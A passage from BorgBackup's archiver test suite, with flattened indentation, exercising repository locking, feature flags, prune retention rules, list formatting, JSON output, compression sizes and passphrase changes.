self.cmd('list', self.repository_location, '--bypass-lock')
@unittest.skipUnless(llfuse, 'llfuse not installed')
def test_readonly_mount(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.create_src_archive('test')
with self.read_only(self.repository_path):
# verify that command normally doesn't work with read-only repo
if self.FORK_DEFAULT:
with self.fuse_mount(self.repository_location, exit_code=EXIT_ERROR):
pass
else:
with pytest.raises((LockFailed, RemoteRepository.RPCError)) as excinfo:
# self.fuse_mount always assumes fork=True, so for this test we have to manually set fork=False
with self.fuse_mount(self.repository_location, fork=False):
pass
if isinstance(excinfo.value, RemoteRepository.RPCError):
assert excinfo.value.exception_class == 'LockFailed'
# verify that command works with read-only repo when using --bypass-lock
with self.fuse_mount(self.repository_location, None, '--bypass-lock'):
pass
@pytest.mark.skipif('BORG_TESTS_IGNORE_MODES' in os.environ, reason='modes unreliable')
def test_umask(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
mode = os.stat(self.repository_path).st_mode
self.assertEqual(stat.S_IMODE(mode), 0o700)
def test_create_dry_run(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', '--dry-run', self.repository_location + '::test', 'input')
# Make sure no archive has been created
with Repository(self.repository_path) as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
self.assert_equal(len(manifest.archives), 0)
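# Helper: mark the given manifest operation as requiring an (unsupported) mandatory
# feature, so that commands needing this operation must refuse to work on the repo.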
def add_unknown_feature(self, operation):
with Repository(self.repository_path, exclusive=True) as repository:
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
manifest.config[b'feature_flags'] = {operation.value.encode(): {b'mandatory': [b'unknown-feature']}}
manifest.write()
repository.commit(compact=False)
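# Helper: run a borg command and assert that it fails because of the unsupported
# mandatory feature (EXIT_ERROR when forking, MandatoryFeatureUnsupported otherwise).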
def cmd_raises_unknown_feature(self, args):
if self.FORK_DEFAULT:
self.cmd(*args, exit_code=EXIT_ERROR)
else:
with pytest.raises(MandatoryFeatureUnsupported) as excinfo:
self.cmd(*args)
assert excinfo.value.args == (['unknown-feature'],)
def test_unknown_feature_on_create(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.add_unknown_feature(Manifest.Operation.WRITE)
self.cmd_raises_unknown_feature(['create', self.repository_location + '::test', 'input'])
def test_unknown_feature_on_cache_sync(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('delete', '--cache-only', self.repository_location)
self.add_unknown_feature(Manifest.Operation.READ)
self.cmd_raises_unknown_feature(['create', self.repository_location + '::test', 'input'])
def test_unknown_feature_on_change_passphrase(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.add_unknown_feature(Manifest.Operation.CHECK)
self.cmd_raises_unknown_feature(['key', 'change-passphrase', self.repository_location])
def test_unknown_feature_on_read(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.cmd('create', self.repository_location + '::test', 'input')
self.add_unknown_feature(Manifest.Operation.READ)
with changedir('output'):
self.cmd_raises_unknown_feature(['extract', self.repository_location + '::test'])
self.cmd_raises_unknown_feature(['list', self.repository_location])
self.cmd_raises_unknown_feature(['info', self.repository_location + '::test'])
def test_unknown_feature_on_rename(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.cmd('create', self.repository_location + '::test', 'input')
self.add_unknown_feature(Manifest.Operation.CHECK)
self.cmd_raises_unknown_feature(['rename', self.repository_location + '::test', 'other'])
def test_unknown_feature_on_delete(self):
print(self.cmd('init', '--encryption=repokey', self.repository_location))
self.cmd('create', self.repository_location + '::test', 'input')
self.add_unknown_feature(Manifest.Operation.DELETE)
# deleting a single archive raises
self.cmd_raises_unknown_feature(['delete', self.repository_location + '::test'])
self.cmd_raises_unknown_feature(['prune', '--keep-daily=3', self.repository_location])
# deleting the whole repository ignores feature flags
self.cmd('delete', self.repository_location)
@unittest.skipUnless(llfuse, 'llfuse not installed')
def test_unknown_feature_on_mount(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
self.add_unknown_feature(Manifest.Operation.READ)
mountpoint = os.path.join(self.tmpdir, 'mountpoint')
os.mkdir(mountpoint)
# XXX this might hang if it doesn't raise an error
self.cmd_raises_unknown_feature(['mount', self.repository_location + '::test', mountpoint])
@pytest.mark.allow_cache_wipe
def test_unknown_mandatory_feature_in_cache(self):
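# Put an unknown mandatory feature into the local cache config; a subsequent
# create must wipe and rebuild the cache and end up with no mandatory features.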
if self.prefix:
path_prefix = 'ssh://__testsuite__'
else:
path_prefix = ''
print(self.cmd('init', '--encryption=repokey', self.repository_location))
with Repository(self.repository_path, exclusive=True) as repository:
if path_prefix:
repository._location = Location(self.repository_location)
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
with Cache(repository, key, manifest) as cache:
cache.begin_txn()
cache.cache_config.mandatory_features = set(['unknown-feature'])
cache.commit()
if self.FORK_DEFAULT:
self.cmd('create', self.repository_location + '::test', 'input')
else:
called = False
wipe_cache_safe = LocalCache.wipe_cache
def wipe_wrapper(*args):
nonlocal called
called = True
wipe_cache_safe(*args)
with patch.object(LocalCache, 'wipe_cache', wipe_wrapper):
self.cmd('create', self.repository_location + '::test', 'input')
assert called
with Repository(self.repository_path, exclusive=True) as repository:
if path_prefix:
repository._location = Location(self.repository_location)
manifest, key = Manifest.load(repository, Manifest.NO_OPERATION_CHECK)
with Cache(repository, key, manifest) as cache:
assert cache.cache_config.mandatory_features == set([])
def test_progress_on(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--progress', self.repository_location + '::test4', 'input')
self.assert_in("\r", output)
def test_progress_off(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', self.repository_location + '::test5', 'input')
self.assert_not_in("\r", output)
def test_file_status(self):
"""test that various file status show expected results
clearly incomplete: only tests for the weird "unchanged" status for now"""
self.create_regular_file('file1', size=1024 * 80)
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--list', self.repository_location + '::test', 'input')
self.assert_in("A input/file1", output)
self.assert_in("A input/file2", output)
# should find first file as unmodified
output = self.cmd('create', '--list', self.repository_location + '::test1', 'input')
self.assert_in("U input/file1", output)
# this is expected, although surprising; for an explanation, see:
# https://borgbackup.readthedocs.org/en/latest/faq.html#i-am-seeing-a-added-status-for-a-unchanged-file
self.assert_in("A input/file2", output)
def test_file_status_cs_cache_mode(self):
"""test that a changed file with faked "previous" mtime still gets backed up in ctime,size cache_mode"""
self.create_regular_file('file1', contents=b'123')
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=10)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--list', '--files-cache=ctime,size', self.repository_location + '::test1', 'input')
# modify file1, but cheat with the mtime (and atime) and also keep same size:
st = os.stat('input/file1')
self.create_regular_file('file1', contents=b'321')
os.utime('input/file1', ns=(st.st_atime_ns, st.st_mtime_ns))
# this mode uses ctime for change detection, so it should find file1 as modified
output = self.cmd('create', '--list', '--files-cache=ctime,size', self.repository_location + '::test2', 'input')
self.assert_in("M input/file1", output)
def test_file_status_ms_cache_mode(self):
"""test that a chmod'ed file with no content changes does not get chunked again in mtime,size cache_mode"""
self.create_regular_file('file1', size=10)
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=10)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--list', '--files-cache=mtime,size', self.repository_location + '::test1', 'input')
# change mode of file1, no content change:
st = os.stat('input/file1')
os.chmod('input/file1', st.st_mode ^ stat.S_IRWXO) # this triggers a ctime change, but mtime is unchanged
# this mode uses mtime for change detection, so it should find file1 as unmodified
output = self.cmd('create', '--list', '--files-cache=mtime,size', self.repository_location + '::test2', 'input')
self.assert_in("U input/file1", output)
def test_file_status_rc_cache_mode(self):
"""test that files get rechunked unconditionally in rechunk,ctime cache mode"""
self.create_regular_file('file1', size=10)
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=10)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--list', '--files-cache=rechunk,ctime', self.repository_location + '::test1', 'input')
# no changes here, but this mode rechunks unconditionally
output = self.cmd('create', '--list', '--files-cache=rechunk,ctime', self.repository_location + '::test2', 'input')
self.assert_in("A input/file1", output)
def test_file_status_excluded(self):
"""test that excluded paths are listed"""
self.create_regular_file('file1', size=1024 * 80)
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=1024 * 80)
if has_lchflags:
self.create_regular_file('file3', size=1024 * 80)
platform.set_flags(os.path.join(self.input_path, 'file3'), stat.UF_NODUMP)
self.cmd('init', '--encryption=repokey', self.repository_location)
output = self.cmd('create', '--list', '--exclude-nodump', self.repository_location + '::test', 'input')
self.assert_in("A input/file1", output)
self.assert_in("A input/file2", output)
if has_lchflags:
self.assert_in("x input/file3", output)
# should find second file as excluded
output = self.cmd('create', '--list', '--exclude-nodump', self.repository_location + '::test1', 'input', '--exclude', '*/file2')
self.assert_in("U input/file1", output)
self.assert_in("x input/file2", output)
if has_lchflags:
self.assert_in("x input/file3", output)
def test_create_json(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
create_info = json.loads(self.cmd('create', '--json', self.repository_location + '::test', 'input'))
# The usual keys
assert 'encryption' in create_info
assert 'repository' in create_info
assert 'cache' in create_info
assert 'last_modified' in create_info['repository']
archive = create_info['archive']
assert archive['name'] == 'test'
assert isinstance(archive['command_line'], list)
assert isinstance(archive['duration'], float)
assert len(archive['id']) == 64
assert 'stats' in archive
def test_create_topical(self):
self.create_regular_file('file1', size=1024 * 80)
time.sleep(1) # file2 must have newer timestamps than file1
self.create_regular_file('file2', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
# no listing by default
output = self.cmd('create', self.repository_location + '::test', 'input')
self.assert_not_in('file1', output)
# shouldn't be listed even if unchanged
output = self.cmd('create', self.repository_location + '::test0', 'input')
self.assert_not_in('file1', output)
# should list the file as unchanged
output = self.cmd('create', '--list', '--filter=U', self.repository_location + '::test1', 'input')
self.assert_in('file1', output)
# should *not* list the file as changed
output = self.cmd('create', '--list', '--filter=AM', self.repository_location + '::test2', 'input')
self.assert_not_in('file1', output)
# change the file
self.create_regular_file('file1', size=1024 * 100)
# should list the file as changed
output = self.cmd('create', '--list', '--filter=AM', self.repository_location + '::test3', 'input')
self.assert_in('file1', output)
@pytest.mark.skipif(not are_fifos_supported(), reason='FIFOs not supported')
def test_create_read_special_symlink(self):
from threading import Thread
def fifo_feeder(fifo_fn, data):
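# feed the data into the FIFO; runs in a background thread so 'create --read-special' can read it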
fd = os.open(fifo_fn, os.O_WRONLY)
try:
os.write(fd, data)
finally:
os.close(fd)
self.cmd('init', '--encryption=repokey', self.repository_location)
archive = self.repository_location + '::test'
data = b'foobar' * 1000
fifo_fn = os.path.join(self.input_path, 'fifo')
link_fn = os.path.join(self.input_path, 'link_fifo')
os.mkfifo(fifo_fn)
os.symlink(fifo_fn, link_fn)
t = Thread(target=fifo_feeder, args=(fifo_fn, data))
t.start()
try:
self.cmd('create', '--read-special', archive, 'input/link_fifo')
finally:
t.join()
with changedir('output'):
self.cmd('extract', archive)
fifo_fn = 'input/link_fifo'
with open(fifo_fn, 'rb') as f:
extracted_data = f.read()
assert extracted_data == data
def test_create_read_special_broken_symlink(self):
os.symlink('somewhere does not exist', os.path.join(self.input_path, 'link'))
self.cmd('init', '--encryption=repokey', self.repository_location)
archive = self.repository_location + '::test'
self.cmd('create', '--read-special', archive, 'input')
output = self.cmd('list', archive)
assert 'input/link -> somewhere does not exist' in output
# def test_cmdline_compatibility(self):
# self.create_regular_file('file1', size=1024 * 80)
# self.cmd('init', '--encryption=repokey', self.repository_location)
# self.cmd('create', self.repository_location + '::test', 'input')
# output = self.cmd('foo', self.repository_location, '--old')
# self.assert_in('"--old" has been deprecated. Use "--new" instead', output)
def test_prune_repository(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test1', src_dir)
self.cmd('create', self.repository_location + '::test2', src_dir)
# these are not really checkpoints, but they look like some:
self.cmd('create', self.repository_location + '::test3.checkpoint', src_dir)
self.cmd('create', self.repository_location + '::test3.checkpoint.1', src_dir)
self.cmd('create', self.repository_location + '::test4.checkpoint', src_dir)
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=1')
assert re.search(r'Would prune:\s+test1', output)
# must keep the latest non-checkpoint archive:
assert re.search(r'Keeping archive \(rule: daily #1\):\s+test2', output)
# must keep the latest checkpoint archive:
assert re.search(r'Keeping checkpoint archive:\s+test4.checkpoint', output)
output = self.cmd('list', '--consider-checkpoints', self.repository_location)
self.assert_in('test1', output)
self.assert_in('test2', output)
self.assert_in('test3.checkpoint', output)
self.assert_in('test3.checkpoint.1', output)
self.assert_in('test4.checkpoint', output)
self.cmd('prune', self.repository_location, '--keep-daily=1')
output = self.cmd('list', '--consider-checkpoints', self.repository_location)
self.assert_not_in('test1', output)
# the latest non-checkpoint archive must be still there:
self.assert_in('test2', output)
# only the latest checkpoint archive must still be there:
self.assert_not_in('test3.checkpoint', output)
self.assert_not_in('test3.checkpoint.1', output)
self.assert_in('test4.checkpoint', output)
# now we supersede the latest checkpoint with a successful backup:
self.cmd('create', self.repository_location + '::test5', src_dir)
self.cmd('prune', self.repository_location, '--keep-daily=2')
output = self.cmd('list', '--consider-checkpoints', self.repository_location)
# all checkpoints should be gone now:
self.assert_not_in('checkpoint', output)
# the latest archive must be still there
self.assert_in('test5', output)
# Given a date and time in local tz, create a UTC timestamp string suitable
# for create --timestamp command line option
def _to_utc_timestamp(self, year, month, day, hour, minute, second):
dtime = datetime(year, month, day, hour, minute, second, 0, dateutil.tz.gettz())
return dtime.astimezone(dateutil.tz.UTC).strftime("%Y-%m-%dT%H:%M:%S")
def _create_archive_ts(self, name, y, m, d, H=0, M=0, S=0):
loc = self.repository_location + '::' + name
self.cmd('create', '--timestamp', self._to_utc_timestamp(y, m, d, H, M, S), loc, src_dir)
# This test must match docs/misc/prune-example.txt
def test_prune_repository_example(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
# Archives that will be kept, per the example
# Oldest archive
self._create_archive_ts('test01', 2015, 1, 1)
# 6 monthly archives
self._create_archive_ts('test02', 2015, 6, 30)
self._create_archive_ts('test03', 2015, 7, 31)
self._create_archive_ts('test04', 2015, 8, 31)
self._create_archive_ts('test05', 2015, 9, 30)
self._create_archive_ts('test06', 2015, 10, 31)
self._create_archive_ts('test07', 2015, 11, 30)
# 14 daily archives
self._create_archive_ts('test08', 2015, 12, 17)
self._create_archive_ts('test09', 2015, 12, 18)
self._create_archive_ts('test10', 2015, 12, 20)
self._create_archive_ts('test11', 2015, 12, 21)
self._create_archive_ts('test12', 2015, 12, 22)
self._create_archive_ts('test13', 2015, 12, 23)
self._create_archive_ts('test14', 2015, 12, 24)
self._create_archive_ts('test15', 2015, 12, 25)
self._create_archive_ts('test16', 2015, 12, 26)
self._create_archive_ts('test17', 2015, 12, 27)
self._create_archive_ts('test18', 2015, 12, 28)
self._create_archive_ts('test19', 2015, 12, 29)
self._create_archive_ts('test20', 2015, 12, 30)
self._create_archive_ts('test21', 2015, 12, 31)
# Additional archives that would be pruned
# The second backup of the year
self._create_archive_ts('test22', 2015, 1, 2)
# The next older monthly backup
self._create_archive_ts('test23', 2015, 5, 31)
# The next older daily backup
self._create_archive_ts('test24', 2015, 12, 16)
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=14', '--keep-monthly=6', '--keep-yearly=1')
# Prune second backup of the year
assert re.search(r'Would prune:\s+test22', output)
# Prune next older monthly and daily backups
assert re.search(r'Would prune:\s+test23', output)
assert re.search(r'Would prune:\s+test24', output)
# Must keep the other 21 backups
# Yearly is kept as oldest archive
assert re.search(r'Keeping archive \(rule: yearly\[oldest\] #1\):\s+test01', output)
for i in range(1, 7):
assert re.search(r'Keeping archive \(rule: monthly #' + str(i) + r'\):\s+test' + ("%02d" % (8-i)), output)
for i in range(1, 15):
assert re.search(r'Keeping archive \(rule: daily #' + str(i) + r'\):\s+test' + ("%02d" % (22-i)), output)
output = self.cmd('list', self.repository_location)
# Nothing pruned after dry run
for i in range(1, 25):
self.assert_in('test%02d' % i, output)
self.cmd('prune', self.repository_location, '--keep-daily=14', '--keep-monthly=6', '--keep-yearly=1')
output = self.cmd('list', self.repository_location)
# All matching backups plus oldest kept
for i in range(1, 22):
self.assert_in('test%02d' % i, output)
# Other backups have been pruned
for i in range(22, 25):
self.assert_not_in('test%02d' % i, output)
# With an initial backup followed by daily backups, prune daily until the oldest is replaced by a monthly backup
def test_prune_retain_and_expire_oldest(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
# Initial backup
self._create_archive_ts('original_archive', 2020, 9, 1, 11, 15)
# Archive and prune daily for 30 days
for i in range(1, 31):
self._create_archive_ts('september%02d' % i, 2020, 9, i, 12)
self.cmd('prune', self.repository_location, '--keep-daily=7', '--keep-monthly=1')
# Archive and prune 6 days into the next month
for i in range(1, 7):
self._create_archive_ts('october%02d' % i, 2020, 10, i, 12)
self.cmd('prune', self.repository_location, '--keep-daily=7', '--keep-monthly=1')
# Oldest backup is still retained
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=7', '--keep-monthly=1')
assert re.search(r'Keeping archive \(rule: monthly\[oldest\] #1' + r'\):\s+original_archive', output)
# Archive one more day and prune.
self._create_archive_ts('october07', 2020, 10, 7, 12)
self.cmd('prune', self.repository_location, '--keep-daily=7', '--keep-monthly=1')
# Last day of previous month is retained as monthly, and oldest is expired.
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=7', '--keep-monthly=1')
assert re.search(r'Keeping archive \(rule: monthly #1\):\s+september30', output)
self.assert_not_in('original_archive', output)
def test_prune_repository_save_space(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test1', src_dir)
self.cmd('create', self.repository_location + '::test2', src_dir)
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=1')
assert re.search(r'Keeping archive \(rule: daily #1\):\s+test2', output)
assert re.search(r'Would prune:\s+test1', output)
output = self.cmd('list', self.repository_location)
self.assert_in('test1', output)
self.assert_in('test2', output)
self.cmd('prune', '--save-space', self.repository_location, '--keep-daily=1')
output = self.cmd('list', self.repository_location)
self.assert_not_in('test1', output)
self.assert_in('test2', output)
def test_prune_repository_prefix(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::foo-2015-08-12-10:00', src_dir)
self.cmd('create', self.repository_location + '::foo-2015-08-12-20:00', src_dir)
self.cmd('create', self.repository_location + '::bar-2015-08-12-10:00', src_dir)
self.cmd('create', self.repository_location + '::bar-2015-08-12-20:00', src_dir)
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=1', '--prefix=foo-')
assert re.search(r'Keeping archive \(rule: daily #1\):\s+foo-2015-08-12-20:00', output)
assert re.search(r'Would prune:\s+foo-2015-08-12-10:00', output)
output = self.cmd('list', self.repository_location)
self.assert_in('foo-2015-08-12-10:00', output)
self.assert_in('foo-2015-08-12-20:00', output)
self.assert_in('bar-2015-08-12-10:00', output)
self.assert_in('bar-2015-08-12-20:00', output)
self.cmd('prune', self.repository_location, '--keep-daily=1', '--prefix=foo-')
output = self.cmd('list', self.repository_location)
self.assert_not_in('foo-2015-08-12-10:00', output)
self.assert_in('foo-2015-08-12-20:00', output)
self.assert_in('bar-2015-08-12-10:00', output)
self.assert_in('bar-2015-08-12-20:00', output)
def test_prune_repository_glob(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::2015-08-12-10:00-foo', src_dir)
self.cmd('create', self.repository_location + '::2015-08-12-20:00-foo', src_dir)
self.cmd('create', self.repository_location + '::2015-08-12-10:00-bar', src_dir)
self.cmd('create', self.repository_location + '::2015-08-12-20:00-bar', src_dir)
output = self.cmd('prune', '--list', '--dry-run', self.repository_location, '--keep-daily=1', '--glob-archives=2015-*-foo')
assert re.search(r'Keeping archive \(rule: daily #1\):\s+2015-08-12-20:00-foo', output)
assert re.search(r'Would prune:\s+2015-08-12-10:00-foo', output)
output = self.cmd('list', self.repository_location)
self.assert_in('2015-08-12-10:00-foo', output)
self.assert_in('2015-08-12-20:00-foo', output)
self.assert_in('2015-08-12-10:00-bar', output)
self.assert_in('2015-08-12-20:00-bar', output)
self.cmd('prune', self.repository_location, '--keep-daily=1', '--glob-archives=2015-*-foo')
output = self.cmd('list', self.repository_location)
self.assert_not_in('2015-08-12-10:00-foo', output)
self.assert_in('2015-08-12-20:00-foo', output)
self.assert_in('2015-08-12-10:00-bar', output)
self.assert_in('2015-08-12-20:00-bar', output)
def test_list_prefix(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test-1', src_dir)
self.cmd('create', self.repository_location + '::something-else-than-test-1', src_dir)
self.cmd('create', self.repository_location + '::test-2', src_dir)
output = self.cmd('list', '--prefix=test-', self.repository_location)
self.assert_in('test-1', output)
self.assert_in('test-2', output)
self.assert_not_in('something-else', output)
def test_list_format(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
test_archive = self.repository_location + '::test'
self.cmd('create', test_archive, src_dir)
output_1 = self.cmd('list', test_archive)
output_2 = self.cmd('list', '--format', '{mode} {user:6} {group:6} {size:8d} {mtime} {path}{extra}{NEWLINE}', test_archive)
output_3 = self.cmd('list', '--format', '{mtime:%s} {path}{NL}', test_archive)
self.assertEqual(output_1, output_2)
self.assertNotEqual(output_1, output_3)
def test_list_repository_format(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', '--comment', 'comment 1', self.repository_location + '::test-1', src_dir)
self.cmd('create', '--comment', 'comment 2', self.repository_location + '::test-2', src_dir)
output_1 = self.cmd('list', self.repository_location)
output_2 = self.cmd('list', '--format', '{archive:<36} {time} [{id}]{NL}', self.repository_location)
self.assertEqual(output_1, output_2)
output_1 = self.cmd('list', '--short', self.repository_location)
self.assertEqual(output_1, 'test-1\ntest-2\n')
output_1 = self.cmd('list', '--format', '{barchive}/', self.repository_location)
self.assertEqual(output_1, 'test-1/test-2/')
output_3 = self.cmd('list', '--format', '{name} {comment}{NL}', self.repository_location)
self.assert_in('test-1 comment 1\n', output_3)
self.assert_in('test-2 comment 2\n', output_3)
def test_list_hash(self):
self.create_regular_file('empty_file', size=0)
self.create_regular_file('amb', contents=b'a' * 1000000)
self.cmd('init', '--encryption=repokey', self.repository_location)
test_archive = self.repository_location + '::test'
self.cmd('create', test_archive, 'input')
output = self.cmd('list', '--format', '{sha256} {path}{NL}', test_archive)
assert "cdc76e5c9914fb9281a1c7e284d73e67f1809a48a497200e046d39ccc7112cd0 input/amb" in output
assert "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 input/empty_file" in output
def test_list_consider_checkpoints(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test1', src_dir)
# these are not really checkpoints, but they look like some:
self.cmd('create', self.repository_location + '::test2.checkpoint', src_dir)
self.cmd('create', self.repository_location + '::test3.checkpoint.1', src_dir)
output = self.cmd('list', self.repository_location)
assert "test1" in output
assert "test2.checkpoint" not in output
assert "test3.checkpoint.1" not in output
output = self.cmd('list', '--consider-checkpoints', self.repository_location)
assert "test1" in output
assert "test2.checkpoint" in output
assert "test3.checkpoint.1" in output
def test_list_chunk_counts(self):
self.create_regular_file('empty_file', size=0)
self.create_regular_file('two_chunks')
with open(os.path.join(self.input_path, 'two_chunks'), 'wb') as fd:
fd.write(b'abba' * 2000000)
fd.write(b'baab' * 2000000)
self.cmd('init', '--encryption=repokey', self.repository_location)
test_archive = self.repository_location + '::test'
self.cmd('create', test_archive, 'input')
output = self.cmd('list', '--format', '{num_chunks} {unique_chunks} {path}{NL}', test_archive)
assert "0 0 input/empty_file" in output
assert "2 2 input/two_chunks" in output
def test_list_size(self):
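# {dsize}/{dcsize} are the deduplicated (compressed) sizes, so they can never exceed {size}/{csize}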
self.create_regular_file('compressible_file', size=10000)
self.cmd('init', '--encryption=repokey', self.repository_location)
test_archive = self.repository_location + '::test'
self.cmd('create', '-C', 'lz4', test_archive, 'input')
output = self.cmd('list', '--format', '{size} {csize} {dsize} {dcsize} {path}{NL}', test_archive)
size, csize, dsize, dcsize, path = output.split("\n")[1].split(" ")
assert int(csize) < int(size)
assert int(dcsize) < int(dsize)
assert int(dsize) <= int(size)
assert int(dcsize) <= int(csize)
def test_list_json(self):
self.create_regular_file('file1', size=1024 * 80)
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input')
list_repo = json.loads(self.cmd('list', '--json', self.repository_location))
repository = list_repo['repository']
assert len(repository['id']) == 64
assert datetime.strptime(repository['last_modified'], ISO_FORMAT) # must not raise
assert list_repo['encryption']['mode'] == 'repokey'
assert 'keyfile' not in list_repo['encryption']
archive0 = list_repo['archives'][0]
assert datetime.strptime(archive0['time'], ISO_FORMAT) # must not raise
list_archive = self.cmd('list', '--json-lines', self.repository_location + '::test')
items = [json.loads(s) for s in list_archive.splitlines()]
assert len(items) == 2
file1 = items[1]
assert file1['path'] == 'input/file1'
assert file1['size'] == 81920
assert datetime.strptime(file1['mtime'], ISO_FORMAT) # must not raise
list_archive = self.cmd('list', '--json-lines', '--format={sha256}', self.repository_location + '::test')
items = [json.loads(s) for s in list_archive.splitlines()]
assert len(items) == 2
file1 = items[1]
assert file1['path'] == 'input/file1'
assert file1['sha256'] == 'b2915eb69f260d8d3c25249195f2c8f4f716ea82ec760ae929732c0262442b2b'
def test_list_json_args(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('list', '--json-lines', self.repository_location, exit_code=2)
self.cmd('list', '--json', self.repository_location + '::archive', exit_code=2)
def test_log_json(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
log = self.cmd('create', '--log-json', self.repository_location + '::test', 'input', '--list', '--debug')
messages = {} # type -> message, one of each kind
for line in log.splitlines():
msg = json.loads(line)
messages[msg['type']] = msg
file_status = messages['file_status']
assert 'status' in file_status
assert file_status['path'].startswith('input')
log_message = messages['log_message']
assert isinstance(log_message['time'], float)
assert log_message['levelname'] == 'DEBUG' # there should only be DEBUG messages
assert isinstance(log_message['message'], str)
def test_debug_profile(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
self.cmd('create', self.repository_location + '::test', 'input', '--debug-profile=create.prof')
self.cmd('debug', 'convert-profile', 'create.prof', 'create.pyprof')
stats = pstats.Stats('create.pyprof')
stats.strip_dirs()
stats.sort_stats('cumtime')
self.cmd('create', self.repository_location + '::test2', 'input', '--debug-profile=create.pyprof')
stats = pstats.Stats('create.pyprof') # Only do this on trusted data!
stats.strip_dirs()
stats.sort_stats('cumtime')
def test_common_options(self):
self.create_test_files()
self.cmd('init', '--encryption=repokey', self.repository_location)
log = self.cmd('--debug', 'create', self.repository_location + '::test', 'input')
assert 'security: read previous location' in log
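# Helper: back up one file (repetitive content if compressible, random bytes otherwise)
# with the given compression and return its original and compressed size from 'borg list'.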
def _get_sizes(self, compression, compressible, size=10000):
if compressible:
contents = b'X' * size
else:
contents = os.urandom(size)
self.create_regular_file('file', contents=contents)
self.cmd('init', '--encryption=none', self.repository_location)
archive = self.repository_location + '::test'
self.cmd('create', '-C', compression, archive, 'input')
output = self.cmd('list', '--format', '{size} {csize} {path}{NL}', archive)
size, csize, path = output.split("\n")[1].split(" ")
return int(size), int(csize)
def test_compression_none_compressible(self):
size, csize = self._get_sizes('none', compressible=True)
assert csize == size + 3
def test_compression_none_uncompressible(self):
size, csize = self._get_sizes('none', compressible=False)
assert csize == size + 3
def test_compression_zlib_compressible(self):
size, csize = self._get_sizes('zlib', compressible=True)
assert csize < size * 0.1
assert csize == 35
def test_compression_zlib_uncompressible(self):
size, csize = self._get_sizes('zlib', compressible=False)
assert csize >= size
def test_compression_auto_compressible(self):
size, csize = self._get_sizes('auto,zlib', compressible=True)
assert csize < size * 0.1
assert csize == 35 # same as compression 'zlib'
def test_compression_auto_uncompressible(self):
size, csize = self._get_sizes('auto,zlib', compressible=False)
assert csize == size + 3 # same as compression 'none'
def test_compression_lz4_compressible(self):
size, csize = self._get_sizes('lz4', compressible=True)
assert csize < size * 0.1
def test_compression_lz4_uncompressible(self):
size, csize = self._get_sizes('lz4', compressible=False)
assert csize == size + 3 # same as compression 'none'
def test_compression_lzma_compressible(self):
size, csize = self._get_sizes('lzma', compressible=True)
assert csize < size * 0.1
def test_compression_lzma_uncompressible(self):
size, csize = self._get_sizes('lzma', compressible=False)
assert csize == size + 3 # same as compression 'none'
def test_compression_zstd_compressible(self):
size, csize = self._get_sizes('zstd', compressible=True)
assert csize < size * 0.1
def test_compression_zstd_uncompressible(self):
size, csize = self._get_sizes('zstd', compressible=False)
assert csize == size + 3 # same as compression 'none'
def test_change_passphrase(self):
self.cmd('init', '--encryption=repokey', self.repository_location)
os.environ['BORG_NEW_PASSPHRASE'] = 'newpassphrase'
# here we have both BORG_PASSPHRASE and BORG_NEW_PASSPHRASE set:
self.cmd('key', 'change-passphrase', self.repository_location)
os.environ['BORG_PASSPHRASE'] = 'newpassphrase'
self.cmd('list', self.repository_location)
